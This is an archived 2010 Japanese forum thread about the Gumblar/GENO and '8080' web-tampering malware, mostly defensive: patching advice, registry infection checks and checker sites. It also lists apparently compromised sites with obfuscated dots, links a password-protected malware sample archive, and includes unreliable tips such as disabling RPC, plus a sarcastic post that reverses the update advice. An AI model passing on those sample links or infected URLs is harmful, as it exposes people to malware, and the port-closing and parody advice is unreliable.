【Gumblar/GENO】Web改竄ウイルス総合スレ5【8080】

[表示 : 全て最新50 1-99 101- 201- 301- 401- 501- 601- 701- 801- 901- 1001- 2chのread.cgiへ]
Update time : 10/18 13:23 / Filesize : 217 KB / Number-of Response : 1002
[このスレッドの書き込みを削除する]
[＋板最近立ったスレ＆熱いスレ一覧 : ＋板最近立ったスレ／記者別一覧] [類似スレッド一覧]


↑キャッシュ検索、類似スレ動作を修正しました、ご迷惑をお掛けしました

1 名前：名無しさん＠お腹いっぱい。 [2010/02/06(土) 01:29:29 ]: 改ざんされたWebページを経由して感染するウイルスの情報・対策スレです

ウイルス情報・対策方法・脆弱性情報などをお願いします
一部のウイルス被害が増加して混乱するようなら別スレを立てて誘導してください

現時点でGumblar(GENO)、8080(『/*LGPL*/』『/*GNU GPL*/』『/*CODE1*/』)
JustExploitなどのインジェクションが流行しています
基本的な対策としてセキュリティ・アップデートを欠かさないようにしましょう

＊＊＊危険と思われるサイトのアドレスはそのまま貼らないで「.」を「●」に変えてください＊＊＊
＊＊＊感染した場合はクリーンインストールと安全なPCからのパスワードの変更を推奨します＊＊＊

【前スレ】
【Gumblar/GENO】Web改竄ウイルス総合スレ3【8080】実質4スレ目
pc11.2ch.net/test/read.cgi/sec/1263865118/
【関連スレ】
GENOウイルススレ　★23
pc11.2ch.net/test/read.cgi/sec/1259607683/
2 名前：名無しさん＠お腹いっぱい。 [2010/02/06(土) 01:30:52 ]: GENO（Gumblar）ウイルス対処法。

行っておくべき事項を箇条書きにしました。
細かなことは他にもいろいろありますが、とりあえず以下を実施して下さい。

(1）Microsoft Update（Windows Update）を実行しシステムを最新の状態にする
(2）Adobe Readerを最新版に更新する
(3) Adobe ReaderのAcrobat JavaScriptを無効に設定
(4) JRE(Java Runtime Environment)を最新版に更新する
(5) Flash Playerを最新版に更新する
(6) QuickTimeを最新版に更新する

(1)～(4)を行っていれば、現時点で改ざんサイトを閲覧してもウイルスには感染しない。
攻撃コードは変化する可能性もあるので、念のため全て行っていただきたい。
Adobe Readerなどのアップデート方法については下記のトピックスを参照のこと。
Acrobat JavaScriptを無効にする方法は以下の通り。

(1）Adobe Readerを起動し[編集]メニューの[環境設定]を選択
(2）「分類」の中の「JavaScript」を選択
(3）「Acrobat JavaScriptを使用」のチェックをクリア
(4）「OK」ボタンを押す

※サイトを運営されている方は、さらに次のことも実施していただきたい。

(1）管理サイトのページなどに意味不明な文字列が埋め込まれていないか確認する
(2）改ざんされていたり、サイト管理に使うパソコンからウイルスが見つかった場合には、
ウイルスに感染していないパソコンを使用して管理サイトのパスワードを変更する
3 名前：名無しさん＠お腹いっぱい。 [2010/02/06(土) 01:32:52 ]: 【脆弱性を利用されやすいソフトウェア】
下記については必ずアップデートしてください
使用していないものはアンインストール推奨です

■ Windows Update / Microsoft Updateを更新
・XP以下は念のためMicrosoft Updateに変更してアップデートする
■ Adobe Reader(Acrobat,Acrobat Reader)を更新 (使っていないならアンインストール)
ttp://get.adobe.com/jp/reader/
・インストール後本体をアップデート
　ヘルプ → アップデートの有無をチェック
・Acrobat Javascriptをオフにする
　編集 → 環境設定 → Javascript → 「Acrobat Javascriptを使用」のチェックを外す
■ Adobe Flash Playerを更新 (動画サイト見てるなら絶対入ってる。IE版、Firefox等の非IE版に注意！)
ttp://get.adobe.com/jp/flashplayer/
ttp://www.adobe.com/jp/shockwave/download/alternates/#fp
・Flash Playerのバージョン確認
ttp://www.adobe.com/jp/software/flash/about/
ttp://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm
■ Adobe Shockwave Playerを更新 (最近は使わないはずなのでアンインストール)
ttp://www.adobe.com/jp/shockwave/download/alternates/#sp
■ Java Runtime Environmentを更新 (Javascriptとは違うので注意)
ttp://www.java.com/ja/
・Javaのバージョン確認
ttp://www.java.com/ja/download/installed.jsp
■ QuickTimeを更新 (メールアドレスの入力は不要。使っていないならアンインストール)
ttp://www.apple.com/jp/quicktime/download/
■ RealPlayerを更新 (使っていないならアンインストール)
ttp://jp.real.com/?mode=basic
4 名前：名無しさん＠お腹いっぱい。 [2010/02/06(土) 01:41:29 ]: 【Gumblar】混ぜるな危険【8080系】

■Gumblar(たぶん消滅済)
2009/4～6に猛威を振るったやつ。
GENOの対応の悪さが「GENOウイルス」という言葉を生み出した。

■Gumblar.x (祝・復活)
2009/10～12に出現。
挿入するコードが Gumblarのそれと同じだった為、
Gumblarの進化型(亜種？)と言われている。
※今後の動向には注意が必要。

■8080系(GNU GPL、CODE1、LGPL、Exception、DEBUG、.ru:X)
Gumblar.x が消滅した直後に出現し、今現在も猛威を振るっている。
※セキュリティソフト依存の防御は非常に危険。

【感染確認方法】
msconfigでスタートアップにsiszyd32.exeとTMD.tmpがあったらご愁傷様(感染確定)

削除はネットワークから切り離して、セーフモードで起動させ
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"sysgif32"="C:\\WINDOWS\\TEMP\\~TMD.tmp"
削除
※sysgif32で検索
↓
○　C:\Documents and Settings\ユーザー名\スタートメニュー\プログラム\スタートアップ\siszyd32.exe
ファイルを削除
5 名前：名無しさん＠お腹いっぱい。 [2010/02/06(土) 01:42:45 ]: 【Gumblar.x / Daonol(新GENO)ウイルスについて】
■ Gumblar被害拡大中(1)(2)(3)
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2092
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2093
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2094
■ Windowsが起動しないときの復旧方法の一例
黒い画面にマウスカーソル (Win32/Daonol)
ttp://blogs.technet.com/jpsecurity/archive/2009/10/23/3288625.aspx
Win32/Daonolの亜種に感染！セーフモードでも起動できないパソコンを復旧するには？
ttp://itpro.nikkeibp.co.jp/article/COLUMN/20091028/339633/?ST=security&P=1
レジストリの修復 Windowsを使わずに修復してみる
ttp://pctrouble.lessismore.cc/boot/recover_registry.html
■ 感染確認・駆除ツール
アンラボ(v3daonol.exe)
ttp://www.ahnlab.co.jp/download/vdn_list.asp
マカフィー(stinger.exe)
ttp://www.mcafee.com/japan/mcafee/support/announcement20091127.asp
Kaspersky(KatesKiller.exe)
ttp://support.kaspersky.com/faq/?qid=208280701

【旧Gumblar(GENO)ウイルスのまとめなど】
＊＊＊【注意！】2009年10月からのGumblar.x / Daonol(新GENO)には無効な情報があります＊＊＊
■ Anubisレポート
ttp://anubis.iseclab.org/?action=result&task_id=1890669b0bd937574e5be45e24c63ea80&format=html
■ GENOウイルスまとめ
ttp://www29.atwiki.jp/geno/
6 名前：名無しさん＠お腹いっぱい。 [2010/02/06(土) 01:44:04 ]: 【8080系ウイルスについて】
メディアなどでは「ガンブラー(の亜種)」と紹介されていますが
Gumblar系とは別種のウイルスで、最近のものはページソースの最後あたりに
<script>/*LGPL*/
<script>/*GNU GPL*/
<script>/*CODE1*/
などから始まる難読化したスクリプトが埋め込まれています
2009年12月現在、最新版のAdobe Readerおよびそれ以前の脆弱性を利用しているため
回避策としてAcrobat Javascriptのチェックを外してください
修正版の配布は2010年1月13日の予定です
他にもMicrosoftとJRE(Java Runtime Environment)の脆弱性を
利用していますがこちらはアップデートで対処できます
感染すると他のウイルスなどを呼び込むため非常に危険です
■ 新手の正規サイト改ざんでAdobe Readerのゼロデイ攻撃～今すぐ対策を
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2106
■ 感染確認(2000,XP)
あくまで現時点での確認方法であることに注意してください

セーフモードから起動してレジストリエディタでRunエントリ
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
から
"sysgif32"="C:\\WINDOWS\\TEMP\\~TMD.tmp"
"~TM6.tmp"="C:\\WINDOWS\\TEMP\\~TM6.tmp"
等の登録があれば感染済

上記の登録情報を削除した上で
○　C:\Documents and Settings\ユーザー名\スタートメニュー\プログラム\スタートアップ\siszyd32.exe
のファイルを削除すれば復旧しますが、亜種等で違うこともあるので
可能な限りクリーンインストール＆サイト持ちは
安全なPCからのパスワードの変更を推奨します
7 名前：名無しさん＠お腹いっぱい。 [2010/02/06(土) 01:46:42 ]: 【改ざんサイトの調査など】
■ チェッカーサイト
・Gumblar Checker 2
ttp://gumblarchecker.crz.jp/
・aguse
ttp://www.aguse.net/
・飛び先のチェック by ぴょん基地の友達
ttp://www.kakiko.com/check/sample.html
・WebGetter
ttp://rd.or.tp/get.php
・Dan's View Source
ttp://www.dan.co.uk/viewsource/
■ 専ブラで右クリからの検索を有効にする方法。
設定例：JaneView

設定＞基本＞機能＞コマンド欄で
コマンド名　任意の名前
実行するコマンドに　任意のURL
を記載して追加。終わったら「よろし」をクリック。
これで設定完了。
www.geocities.jp/nanasi_san_exe/online_help/option/function/command.html

これで専ブラから検索でチェックできるようになります。

以下がそのコマンドの一例になります。
aguse.net サイト情報検索=www.aguse.net/result1.php?url=$LINK
飛び先のチェック=www.kakiko.com/check/?$LINK
WebGetterでソースを見る=rd.or.tp/get.php?site=$LINK&act=view
WebGetterでタグを除去してソースを見る=rd.or.tp/get.php?site=$LINK&act=strip
WebGetterでリンクを抽出する=rd.or.tp/get.php?site=$LINK&act=link
Dan's View Sourcelでソースを見る=www.dan.co.uk/viewsource/index.php?url=$LINK
8 名前：名無しさん＠お腹いっぱい。 [2010/02/06(土) 01:48:44 ]: 危険ポートを閉じることでセキュリティを強化する。
※【ルータ】未導入の人用です。

【ポート135の役割】
Windows2000/XPは、標準で分散オブジェクト技術(以下：DCOM)を利用しています。
このDCOMを利用すると、他のPCのDCOMソフトを遠隔操作できます。
遠隔操作をする場合に、相手PCに問い合わせをする時のに使用するのがポート135です。
場合によっては、遠隔操作をされてしまう可能性があるものですので、このポートは停止しておきましょう。

ポート番号「135」、「リモート管理・操作等のサービスへのアクセス」
■ポート135を閉じる
「コントロールパネル」 -> 「管理ツール」 -> 「サービス」 -> 「Remote Procedure Call」を選択する。
「Remote Procedure Call (RPC) エンドポイントマッパーや各種の RPC サービスを提供します。」
をダブルクリックし、プロパティを開く。
スタートアップの種類を「無効」にし、OKボタンをクリックしプロパティ画面を閉じる。
変更をしたらPCを再起動する。

ポート番号「445」、「ファイル共有等のサービスへのアクセス」
■ポート445を閉じる
「コントロールパネル」 ->「システム」 ->「ハードウェア」 ->「デバイスマネージャ」の「表示」メニューから
「非表示のデバイスドライバの表示」を選ぶと「プラグアンドプレイではないドライバ」という項目が一覧に加わる。
このツリーを展開して「NetBIOS over TCP/IP」のプロパティを開く。
ここで「ドライバ」タグを選択し、「スタートアップ」の種類を「無効」にする。
変更をしたらPCを再起動する。

ポート135 445
ttp://www.google.com/search?hl=ja&q=%E3%83%9D%E3%83%BC%E3%83%88135+445&lr=lang_ja
9 名前：名無しさん＠お腹いっぱい。 [2010/02/06(土) 01:55:19 ]: (1）Microsoft Update（Windows Update）が不要なものを使う
(2）Adobe Readerは使わないか
(3) Adobe ReaderのAcrobat JavaScriptを無効に設定
(4) JRE(Java Runtime Environment)を削除
(5) Flash Playerを7以降にしない
(6) QuickTimeを最新版に更新する
10 名前：名無しさん＠お腹いっぱい。 [2010/02/06(土) 07:09:49 ]: 　　　／: : : : : : : : :.＼～　 |:::::::/￣￣￣　　　　　　　　￣￣￣|:::::::|　~　／,.　― ､, -―- ､
　　/: : : : : : : : : : : : : ＼~　|＝ﾛ　　 -=・=-　　　　　-=・=-　　ﾛ＝|　.／／.: : : : : : : : : : : :.＼
　/: : : :|: : : : : : : : : : : : :＼|::::::|　　　　　　　ﾉ　　　　　　　　　 |:::::::|／...: : : : :／＼＼: : : : : : :ヽ
. |: : : : ＠ヽ-------‐‐'′.＼::|＊∵∴　　（● ●）　 ∴∴＊|:::／/: : : : : :/　　　　ヾ.＼: : : : : :' ,
.|: : : :/　　　　　　　　　　　 .＼ ∵∴＼＿＿l_l＿＿／∵∴ |／　 {: : : ///-‐'　　`ー-ヾ.＼: : : : :',
|: : : /￣￣￣￣ヽ===/￣￣￣＼　　　＼＿＿__／　　　 .／　　　ヾ::/ /⌒ヽ.＿/⌒`ヽ＿_,ﾍ: : : ;|
| : =ﾛ　 -=・=-　 |,　┏━━━━━━━━━━━━━━━━━━━━━━┓＿ﾉ　　　 Y¨ヾ!
| : :/ヽ　　　　　　/ﾉ .┃　　　　　ノートンファイター売り場に参上！　　　　　　┃､　　　　　 }}５ﾘ
| :/　｀───　 /.　┃　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　┃ ｀　　　 }ゞ'ｭ
| ﾉ　　　　　 .（●_┃　www.youtube.com/watch?v=jH2LFjbYR0A　 ┃　　　　 lﾍ:::ｭ
|:|　　　　　　　　　　l┗━━━━━━━━━━━━━━━━━━━━━━┛　　　　ﾉ　ヾ
|:|　　　　　　__--￣｀´￣--__　／::,/ﾉ;ノ);;);;／~);;;ﾊ;ﾉ;;ﾉ;;人:＼　rﾃ _ゝ､　　　ｰ　　　　　イ
|:|　　　　　　　 -二二二二- .／::::::l | ,=・=　ﾝｰ―-ｔ=・=､j l:::::ヽ＼　　　｀` ‐ ｀ー一'¨´ﾌ´
|.:＼　　　　　　　　　　　／;::::::::j　`ー-ノ ● ● ヽ一' 　 |::::::::ヽ＼ｰ-　..,,　＿＼　／　＿＿,､-'´
､: : :＼　　　　 _-￣￣￣／/:::::r'rﾉ　　　　　　Ｕ　　　　　　｀`‐､::::ヽ＼　　　＼三三三／
..|Ξ|~ ＼　　　　　　　／ /::::::ﾚ' 　　　ﾞY⌒'ー─'⌒Y　　　　　 i::::::ヽ＼　　　;ゞ○;=く
/: : :ヽ／|＼＿＿__.／　ﾉ::::::/　　　　　　l　､＿__,,ノ │　　　　　l:::::::::｝~　＼／三∧三:＼
|: : : : |　　＼　　／　　 l::::::l　　　　　ﾉゝ､＿_＿_,,ハ　　　　l:::::::::l　　~　＼／　＼三ヽ
11 名前：名無しさん＠お腹いっぱい。 [2010/02/06(土) 07:12:01 ]: 　　　／: : : : : : : : :.＼～　 |:::::::/￣￣￣　　　　　　　　￣￣￣|:::::::|　~　／,.　― ､, -―- ､
　　/: : : : : : : : : : : : : ＼~　|＝ﾛ　　 -=・=-　　　　　-=・=-　　ﾛ＝|　.／／.: : : : : : : : : : : :.＼
　/: : : :|: : : : : : : : : : : : :＼|::::::|　　　　　　　ﾉ　　　　　　　　　 |:::::::|／...: : : : :／＼＼: : : : : : :ヽ
. |: : : : ＠ヽ-------‐‐'′.＼::|＊∵∴　　（● ●）　 ∴∴＊|:::／/: : : : : :/　　　　ヾ.＼: : : : : :' ,
.|: : : :/　　　　　　　　　　　 .＼ ∵∴＼＿＿l_l＿＿／∵∴ |／　 {: : : ///-‐'　　`ー-ヾ.＼: : : : :',
|: : : /￣￣￣￣ヽ===/￣￣￣＼　　　＼＿＿__／　　　 .／　　　ヾ::/ /⌒ヽ.＿/⌒`ヽ＿_,ﾍ: : : ;|
| : =ﾛ　 -=・=-　 |,　┏━━━━━━━━━━━━━━━━━━━━━━┓＿ﾉ　　　 Y¨ヾ!
| : :/ヽ　　　　　　/ﾉ .┃　　　　　ノートンファイター　大勝利！！！　　　　　　┃､　　　　　 }}５ﾘ
| :/　｀───　 /.　┃　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　┃ ｀　　　 }ゞ'ｭ
| ﾉ　　　　　 .（●_┃　www.youtube.com/watch?v=phyxnhSth24　 ┃　　　　 lﾍ:::ｭ
|:|　　　　　　　　　　l┗━━━━━━━━━━━━━━━━━━━━━━┛　　　　ﾉ　ヾ
|:|　　　　　　__--￣｀´￣--__　／::,/ﾉ;ノ);;);;／~);;;ﾊ;ﾉ;;ﾉ;;人:＼　rﾃ _ゝ､　　　ｰ　　　　　イ
|:|　　　　　　　 -二二二二- .／::::::l | ,=・=　ﾝｰ―-ｔ=・=､j l:::::ヽ＼　　　｀` ‐ ｀ー一'¨´ﾌ´
|.:＼　　　　　　　　　　　／;::::::::j　`ー-ノ ● ● ヽ一' 　 |::::::::ヽ＼ｰ-　..,,　＿＼　／　＿＿,､-'´
､: : :＼　　　　 _-￣￣￣／/:::::r'rﾉ　　　　　　Ｕ　　　　　　｀`‐､::::ヽ＼　　　＼三三三／
..|Ξ|~ ＼　　　　　　　／ /::::::ﾚ' 　　　ﾞY⌒'ー─'⌒Y　　　　　 i::::::ヽ＼　　　;ゞ○;=く
/: : :ヽ／|＼＿＿__.／　ﾉ::::::/　　　　　　l　､＿__,,ノ │　　　　　l:::::::::｝~　＼／三∧三:＼
|: : : : |　　＼　　／　　 l::::::l　　　　　ﾉゝ､＿_＿_,,ハ　　　　l:::::::::l　　~　＼／　＼三ヽ
12 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/06(土) 07:14:19 ]: 　　　　　　　　_＿＿＿____
　　　　　　　／:.'｀::::＼／:::::＼
　　　　　／:: 　　　　　　　＼
　　　　　/::. 　／"""　　"""＼ヽ
　　　　　|::〉　　●"　　　 ●"　｜
　　　(⌒ヽ　　　　　　　　　　　｜）
　　　 ( __　　　　　（ ∩∩ ）　　 |　　　がしゃーん
　　　　　｜　　､＿＿_＿＿　　/
　　　　　　ヽ　　　＼＿___/　　/
　　　　　　　＼　　　　　　　 /
　　　　　　　　＼＿＿＿_／
　　　　　　／│　　亀　　│＼　　　　　　　　　がしゃーん
　　　　　＜　　＼＿＿__／　　＞
　　　　　　　　　┃　　　┃
　　　　　　　　　＝　　　＝
亀田ロボや
荒らしが出たら自動でしばくで
13 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/06(土) 08:55:50 ]: RealとかJaveとかQuickTimeは本件とは関係ない
14 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/06(土) 08:58:57 ]: ■亜種が多いので油断大敵ですね。
www.virustotal.com/jp/analisis/eb8d63a5a4a2f97c1129caf0fe84ce651cc8d029cbfcad75ebdc5017793c6715-1259829527

対応済み：AntiVir・AVG・F-Secure・K7AntiVirus・McAfee・Panda・Symantec 他
未対応：Avast・BitDefender・GData・Kaspersky・Microsoft・NOD32・TrendMicro 他
15 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/06(土) 10:26:06 ]: >>14
Kenzeroは板違い
ダウソでやれ
16 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/06(土) 10:46:10 ]: ■亜種が多いので油断大敵ですね。
www.virscan.org/report/949374d42844a7887963bcaac66ffc2e.html
対応済み：AntiVir・Avast・AVG・BitDefender・F-Secure・GData・Kaspersky・McAfee・Microsoft・Panda・TrendMicro 他
未対応：Authentium・Comodo・Dr.Web・Fortinet・JiangMin・KingSoft・Norman・Rising・Symantec・ViRobot 他
17 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/06(土) 12:17:12 ]: チェッカー追加で
ec2-204-236-148-61.us-west-1.compute.amazonaws.com/
18 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/06(土) 22:34:32 ]: ①<丶｀∀´> セキュリティサービスのアンラボ<｀∀´＃>

ニュースリリース　2010-01-12
ttp://www.ahnlab.co.jp/company/press/news_release_view.asp?seq=4537&pageNo=1

ホームページにウイルスが埋め込まれる脅威に対するアンラボの取り組みについて

韓国トップシェアのセキュリティベンダー AhnLab, Inc.（韓国ソウル市）の日本法人である株式会社
アンラボ (東京都千代田区) は、昨今日本でも被害が急増しているホームページにウイルス
(Gumblar その他）が埋め込まれるタイプの脅威に対し、韓国での取り組みと被害状況などを発表します。

韓国インターネット振興院※1 （KISA：Korea Information Security Agency）の発表によると、現在、
韓国でのウイルス感染経路はインターネット経由が中心であり、企業で85%、個人ユーザーの88%の
感染がインターネットからダウンロードしたファイルによるものであることがわかりました (※2)。すべての
年齢層と性別に関わらず同様の数値を示しており、いまやインターネットの利用はすべてのパソコン
ユーザーにとって大きなリスクになっています。

また、アンラボの統計から、危険なホームページの割合は、SNSやオンラインコミュニティが27%、
オンラインショッピングモールが26%、ブログ・個人ホームページ21%、パソコン・IT情報4%、ポータル・
検索サイト4%、その他18%となっています。2009年の1年間でウイルスが埋め込まれたホームページの
数は、韓国で発見されただけでも 338,970 サイトあり、去年7月の統計では、1ヶ月間に配布された
ウイルスが 827 種類、危険なサイトを閲覧したユーザー数は50万名以上にのぼったことがわかっています。
19 名前：名無しさん＠お腹いっぱい。 [2010/02/07(日) 00:20:55 ]: celeb-deaeru●com
bihada5●nes3●com
ggpurasu●com/PS2
gu-zu●com
kyoshin-jp●com
www●custom-mode●com
more-more●net
20 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/07(日) 01:08:33 ]: バンダイのプラモデル
21 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/07(日) 02:30:13 ]: >>14 何故2ヶ月前の結果？
>未対応：Avast・BitDefender・GData・Kaspersky・Microsoft・NOD32・TrendMicro
は、2010.01.22の時点で検出する
www.virustotal.com/analisis/eb8d63a5a4a2f97c1129caf0fe84ce651cc8d029cbfcad75ebdc5017793c6715-1264181996
22 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/07(日) 02:40:59 ]: というか、Kenzeroに引っかかる奴って理解できんわ。
セットアップを起動させてしまうのはともかく、登録フォームが出てきたら普通そこで止めるだろ。
23 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/07(日) 05:27:43 ]: ★★★警告！　試すな危険★★★

>>8の2件は【ルータ】未導入の人用です。
前スレで、安易に手を出した初心者によるトラブルが続出しています。

（どうしても試したい人のための、症状例と救済レジストリ操作等）★保障なし★
ttp://blog.goo.ne.jp/rimotyu/e/4572b0958f2f6881a01be32de9d01ebd
ttp://soudan1.biglobe.ne.jp/qa3068747.html
ttp://weblabo.griffonworks.net/dorlog/2nddorcom/windows/26028.html
24 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/07(日) 09:47:21 ]: >>8は廃止にするんじゃなかったっけ
25 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/07(日) 11:23:05 ]: このスレをたてたのが早漏だから取捨選択もできなかったんだよ
26 名前：名無しさん＠お腹いっぱい。 [2010/02/07(日) 15:38:57 ]: 軽く感染実験・・
環境は、WinXP+SP2(IE6SP2)
設定は初期値
WindowsUpdateは優先度の高い更新を全部入れた。
セキュリティソフトはウイルスバスターCorp8.0SP1　パターン6.829（最新）
インターネット接続は、IIJモバイル
>>19の
>www●custom-mode●com
につないでみた。

(1)AdobeReader無
スクリプトはJS_ONLOAD.SMZで検出される。
TROJ_MALWARE.VTGも検出された。

(2)AdobeReader7.14と7.10で試してみる
スクリプトはJS_ONLOAD.SMZで検出される。
TROJ_MALWARE.VTGも検出された。

(3)ウイルスバスターCorpを切って(1)と(2)を試してみる
接続後しばらく置いてウイルスバスターでスキャンしてみるが何も出ず。
レジストリのRrunを見てみたが変化なし。

感染してないかも・・
27 名前：26 [2010/02/07(日) 15:45:39 ]: >>26で一箇所まちがい。
IEは終了時に一時ファイルを削除するようにしてた。

ついでに他のタイプの改竄サイトでためしてみた
123●sub●jp/iwabuchi/

リアルタイム検索でPossibe_Hifrm-5とTROJ_PIDIEF.SMEが検出されるが
ウイルスバスターを切って問題サイト閲覧後、手動検索とてもなにも見つからない。
レジストリのRUNも書き換わっていなかった。
28 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/07(日) 16:22:34 ]: 前スレまだ埋まっていないしテンプレ修正やってる

pc11.2ch.net/test/read.cgi/sec/1263865118/
29 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/07(日) 17:50:00 ]: 8080系ウイルスの感染確認のセーフモードから起動してレジストリエディタでRunエントリ
のRunエントリが分からない。誰か詳しく教えてください
30 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/07(日) 18:50:24 ]: レジストリエディタを開いて
31 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/07(日) 18:53:53 ]: レジストリエディタを開いて
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
に移動する。この移動先がRunエントリ。このRunエントリに
"sysgif32"="C:\\WINDOWS\\TEMP\\~TMD.tmp"
"~TM6.tmp"="C:\\WINDOWS\\TEMP\\~TM6.tmp"
のようなのがあれば感染してる。
32 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/07(日) 18:54:04 ]: >>30
regeditして開いたよ
33 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/07(日) 18:57:09 ]: くこか
34 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/07(日) 18:57:44 ]: なかった。感染してないようです。ありがと
35 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/07(日) 19:05:28 ]: あと、最近はこんなのもあるらしい
"41561623"="C:\\DOCUME~1\\ALLUSE~1\\APPLIC~1\\41561623\\41561623.exe"
"CTFMON"="C:\\WINDOWS\\Temp\\_ex-08.exe"

ガンブラー感染動画2の詳細
ttp://www.smilebanana.com/archives/2010/01/31-2057.php
36 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/07(日) 19:09:07 ]: で、スタートアップはこれ
C:\Documents and Settings\ユーザー名\スタートメニュー\プログラム\スタートアップ\wwwpos32.exe
37 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/07(日) 19:13:46 ]: 前スレ>>997
labs-uploader.sabaitiba.com/virus/download/1265536270.zip
infected
ファイル名 interiorshop.jp.txt 結果: 17/40
www.virustotal.com/jp/analisis/40430f80cb061b27618234f67d145e592a827fbe1f9a2e5b7112e35e2a15d7ae-1265535499
ファイル名 www.eonet.ne.jp_inoue-clinic.txt
www.virustotal.com/jp/analisis/04d3d7880c7be743253f12bfb755d62559324f47d6734f989bc6076f4e01e46f-1265535677
38 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/07(日) 19:17:01 ]: つーかVirusTotalからいつのまにかノートン消えてたけどいつから？
39 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/07(日) 19:20:50 ]: Symantecって無いか？
40 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/07(日) 19:23:10 ]: 少なくとも>>37のには無かった
41 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/07(日) 19:24:25 ]: ほんとだね
右上の詳細のとこのリストにはあるんだけど
42 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/07(日) 20:18:15 ]: FFFTP Version 1.97 [2010/2/7]
ttp://www2.biglobe.ne.jp/~sota/ffftp.html
43 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/07(日) 20:32:37 ]: >>42
それってこのあいだの改良版と同じ？
44 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/07(日) 20:36:34 ]: FFFTP をVer.1.97にバージョンアップ。
マスターパスワードの機能を導入しました。パスワードが抜かれないための対策として、マスターパスワードを設定してください。この機能は、げんげんさんが開発してくださったものです。ありがとうございます。
パスワードの暗号化をAESを使用して行うようにしました。パスワード保存時の暗号化の強度が高くなりました。この機能はMocaさんが開発してくださったものです。ありがとうございます。
45 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/07(日) 20:49:06 BE:7703377-2BP(1236)]: >>27
めるぽと念のためろりぽにもつーほーしますた。
46 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/07(日) 20:51:38 ]: VirusTotalは気分次第でベンダー2,3社欠けるときが結構あるよ
47 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/07(日) 21:10:31 ]: 気分かｗ
48 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/08(月) 02:14:31 ]: マスターペニス
49 名前：名無しさん＠お腹いっぱい。 [2010/02/08(月) 04:17:00 ]: www●milky-ms●com/index2●html
これって、やっぱこれなの
mca○ee役立たずだった
50 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/08(月) 04:29:55 ]: やられてますな
51 名前：名無しさん＠お腹いっぱい。 [2010/02/08(月) 04:32:53 ]: これどうやったら、削除できるのよ？
とりあえず、netuza32.exeだけは、スタートアップから抜いたけど、
なんかまだあやすぃ。
52 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/08(月) 04:37:32 ]: 　　/￣￣￣ / 　/''７ ./''７　　　　　　　　/￣/　 /''７
　./ ./￣/　/　　/__/ /　/ 　＿＿＿_　　￣　　/　/
　'ー'　_/　/ 　＿__ノ　/　 /＿_＿＿/ 　＿__ノ　/
　　　/___ノ　 /＿___,.／　　　　　　　　 /＿___,.／

　　　_ノ￣/　/￣/　 /''７　/￣￣￣/　　　/￣/　　　　　　　　　　　　/'''７'''７
/￣　　／　　￣　　/　/ 　￣ﾌ　./　　　/　　ﾞー-; 　＿＿＿_　　　/　/　/.＿
￣/　/　　　＿__ノ　/　　__／　 (___　　/　 /ｰ--'ﾞ　/＿_＿＿/　_ノ　/i　 i/ ./
　/__/　　　/＿___,.／　　 /___,.ノゝ＿/　/＿/　　　　　　　　　　　/__,／　ゝ､__/

いやマジで
53 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/08(月) 04:41:14 ]: ありがとう
バカフィー市ね。
54 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/08(月) 04:44:08 ]: クリーンインストールしたら>>3をやっとけ
55 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/08(月) 07:22:18 ]: スクリプト無効にしておけばいいのに
56 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/08(月) 07:34:27 ]: マカフィーならペアレンタルコントロールも使っとけよ。
57 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/08(月) 07:43:45 BE:1258324-2BP(1236)]: >>49
めるぽ、念のためさくらにもつーほーしますた。
58 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/08(月) 08:25:24 ]: マカフィーじゃなくて脆弱性持ちソフトを更新してない>>53が馬鹿なだけなのにな
